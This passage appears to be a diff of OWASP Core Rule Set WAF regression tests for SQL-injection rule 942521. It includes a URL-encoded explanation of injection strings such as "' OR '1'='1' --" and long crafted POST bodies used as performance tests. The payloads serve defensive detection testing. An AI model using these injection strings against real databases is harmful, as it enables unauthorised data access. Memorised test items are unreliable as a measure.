1%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 17 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 18 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 